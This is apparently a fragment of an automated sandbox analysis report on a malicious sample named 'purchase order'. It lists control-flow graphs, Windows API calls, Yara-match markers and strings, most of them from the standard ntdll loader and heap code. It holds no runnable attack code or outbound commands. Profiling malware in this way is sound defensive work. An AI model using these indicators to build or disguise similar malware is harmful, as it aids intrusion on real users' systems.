                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: t577G2K6$t577G2K6
                                                                                                              • API String ID: 1836367815-2667467881

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 37 414653-414665 38 41466d-414685 call 42f9c3 37->38 39 414668 call 42efb3 37->39 42 41468b-4146bd call 404993 call 425593 38->42 43 414686 call 417e43 38->43 39->38 48 4146dd-4146e3 42->48 49 4146bf-4146ce PostThreadMessageW 42->49 43->42 49->48 50 4146d0-4146da 49->50 50->48
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: t577G2K6$t577G2K6
                                                                                                              • API String ID: 1836367815-2667467881

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 231 417f0b-417f14 232 417ea6-417eb7 LdrLoadDll 231->232 233 417f16-417f1c 231->233 235 417eba-417ebd 232->235 234 417f1d 233->234 236 417f1e-417f2a 234->236 237 417f2c 236->237 238 417eec-417f00 237->238 239 417f2e-417f37 237->239 238->237 241 417f02-417f06 238->241 239->234 240 417f39-417f42 239->240 242 417f45-417fa1 240->242 243 417ecf-417ede 240->243 241->236 244 417f08 241->244 246 417ee0-417ee2 243->246 247 417eeb 243->247 244->234 247->238
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 248 42d143-42d184 call 404a23 call 42e053 RtlAllocateHeap
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(?,0041EC3E,?,?,00000000,?,0041EC3E,?,?,?), ref: 0042D17F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 253 42d193-42d1d7 call 404a23 call 42e053 RtlFreeHeap
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D00305,00000007,00000000,00000004,00000000,004176B4,000000F4), ref: 0042D1D2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 263 42d1e3-42d21f call 404a23 call 42e053 ExitProcess
                                                                                                              APIs
                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,601A316F,?,?,601A316F), ref: 0042D21A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExitProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 621844428-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 268 15a2c0a-15a2c0f 269 15a2c1f-15a2c26 LdrInitializeThunk 268->269 270 15a2c11-15a2c18 268->270
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2160512332
                                                                                                              Strings
                                                                                                              • Critical section address, xrefs: 015D5425, 015D54BC, 015D5534
                                                                                                              • Critical section address., xrefs: 015D5502
                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015D54E2
                                                                                                              • Address of the debug info found in the active list., xrefs: 015D54AE, 015D54FA
                                                                                                              • Invalid debug info address of this critical section, xrefs: 015D54B6
                                                                                                              • corrupted critical section, xrefs: 015D54C2
                                                                                                              • Thread identifier, xrefs: 015D553A
                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015D540A, 015D5496, 015D5519
                                                                                                              • 8, xrefs: 015D52E3
                                                                                                              • Critical section debug info address, xrefs: 015D541F, 015D552E
                                                                                                              • undeleted critical section in freed memory, xrefs: 015D542B
                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015D54CE
                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 015D5543
                                                                                                              • double initialized or corrupted critical section, xrefs: 015D5508
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                              • API String ID: 0-2368682639
                                                                                                              Strings
                                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 015D2412
                                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015D25EB
                                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 015D2624
                                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 015D2498
                                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015D22E4
                                                                                                              • @, xrefs: 015D259B
                                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 015D2409
                                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015D24C0
                                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 015D2506
                                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 015D2602
                                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 015D261F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                              • API String ID: 0-4009184096
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                              • API String ID: 0-2515994595
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                              • API String ID: 0-1700792311
                                                                                                              Strings
                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 015E8A3D
                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 015E8A67
                                                                                                              • VerifierDebug, xrefs: 015E8CA5
                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 015E8B8F
                                                                                                              • HandleTraces, xrefs: 015E8C8F
                                                                                                              • VerifierFlags, xrefs: 015E8C50
                                                                                                              • VerifierDlls, xrefs: 015E8CBD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                              • API String ID: 0-3223716464
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                              • API String ID: 0-1109411897
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-792281065
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015B9A11, 015B9A3A
                                                                                                              • apphelp.dll, xrefs: 01556496
                                                                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 015B9A2A
                                                                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015B99ED
                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 015B9A01
                                                                                                              • LdrpInitShimEngine, xrefs: 015B99F4, 015B9A07, 015B9A30
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-204845295
                                                                                                              Strings
                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 015D2160, 015D219A, 015D21BA
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 015D2178
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015D21BF
                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 015D219F
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 015D2180
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 015D2165
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                              • API String ID: 0-861424205
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 015D8181, 015D81F5
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0159C6C3
                                                                                                              • LdrpInitializeImportRedirection, xrefs: 015D8177, 015D81EB
                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 015D81E5
                                                                                                              • LdrpInitializeProcess, xrefs: 0159C6C4
                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 015D8170
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-475462383
                                                                                                              APIs
                                                                                                                • Part of subcall function 015A2DF0: LdrInitializeThunk.NTDLL ref: 015A2DFA
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015A0BA3
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015A0BB6
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015A0D60
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015A0D74
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 1404860816-0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01598421
                                                                                                              • LdrpInitializeProcess, xrefs: 01598422
                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0159855E
                                                                                                              • @, xrefs: 01598591
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                              Strings
                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015D21D9, 015D22B1
                                                                                                              • .Local, xrefs: 015928D8
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015D22B6
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 015D21DE
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                              Strings
                                                                                                              • RtlDeactivateActivationContext, xrefs: 015D3425, 015D3432, 015D3451
                                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 015D3437
                                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 015D3456
                                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 015D342A
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                              Strings
                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 015C1028
                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015C10AE
                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 015C0FE5
                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 015C106B
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                              Strings
                                                                                                              • LdrpDynamicShimModule, xrefs: 015CA998
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015CA9A2
                                                                                                              • apphelp.dll, xrefs: 01582462
                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 015CA992
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              Strings
                                                                                                              • HEAP[%wZ]: , xrefs: 01573255
                                                                                                              • HEAP: , xrefs: 01573264
                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0157327D
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $@
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015CA121
                                                                                                              • LdrpCheckModule, xrefs: 015CA117
                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 015CA10F
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015D82E8
                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 015D82DE
                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 015D82D7
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                              Strings
                                                                                                              • PreferredUILanguages, xrefs: 0161C212
                                                                                                              • @, xrefs: 0161C1F1
                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0161C1C5
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                              • API String ID: 0-2968386058
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                              • API String ID: 0-1373925480
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 015E4899
                                                                                                              • LdrpCheckRedirection, xrefs: 015E488F
                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 015E4888
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-3154609507
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-2558761708
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015E2104
                                                                                                              • LdrpInitializationFailure, xrefs: 015E20FA
                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 015E20F3
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2986994758
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: #%u
                                                                                                              • API String ID: 48624451-232158463
                                                                                                              Strings
                                                                                                              • LdrResSearchResource Enter, xrefs: 0156AA13
                                                                                                              • LdrResSearchResource Exit, xrefs: 0156AA25
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                              • API String ID: 0-4066393604
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: `$`
                                                                                                              • API String ID: 0-197956300
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Legacy$UEFI
                                                                                                              • API String ID: 2994545307-634100481
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$MUI
                                                                                                              • API String ID: 0-17815947
                                                                                                              Strings
                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0156063D
                                                                                                              • kLsE, xrefs: 01560540
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                              • API String ID: 0-2547482624
                                                                                                              Strings
                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0156A309
                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0156A2FB
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                              • API String ID: 0-2876891731
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: MUI
                                                                                                              • API String ID: 0-1339004836
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: GlobalTags
                                                                                                              • API String ID: 0-1106856819
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .mui
                                                                                                              • API String ID: 0-1199573805
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: EXT-
                                                                                                              • API String ID: 0-1948896318
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryHash
                                                                                                              • API String ID: 0-2202222882
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: #
                                                                                                              • API String ID: 0-1885708031
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryName
                                                                                                              • API String ID: 0-215506332
                                                                                                              Strings
                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 015E895E
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                              • API String ID: 0-702105204
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 59374a4862e437078dc8b9c083612d701d0b8a6f9f921ae89dd7ba85b2ea57b3
                                                                                                              • Instruction ID: 25e28fd5ea9e215463a2a6b95a31b88b0f184b18fd2851f3551cc433c7456b83
